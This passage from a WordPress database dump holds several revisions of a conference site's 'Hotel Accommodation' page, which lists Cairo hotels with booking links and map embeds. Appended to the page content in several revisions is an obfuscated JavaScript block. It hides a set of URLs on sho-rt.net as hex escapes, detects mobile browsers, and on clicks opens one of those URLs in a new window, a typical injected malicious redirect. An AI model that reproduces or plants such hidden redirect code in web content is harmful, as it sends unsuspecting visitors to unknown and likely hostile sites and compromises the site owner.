Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:00:56','2023-06-25 19:00:56','',2685,'https://gsw2023.com/?p=4840',0,'revision','',0),
(4841,4,'2023-06-25 19:04:55','2023-06-25 19:04:55','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_gmaps][/vc_column][vc_column width=\"1/2\"][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" stage_padding=\"10\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:04:55','2023-06-25 19:04:55','',2685,'https://gsw2023.com/?p=4841',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4842,4,'2023-06-25 19:07:52','2023-06-25 19:07:52','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" 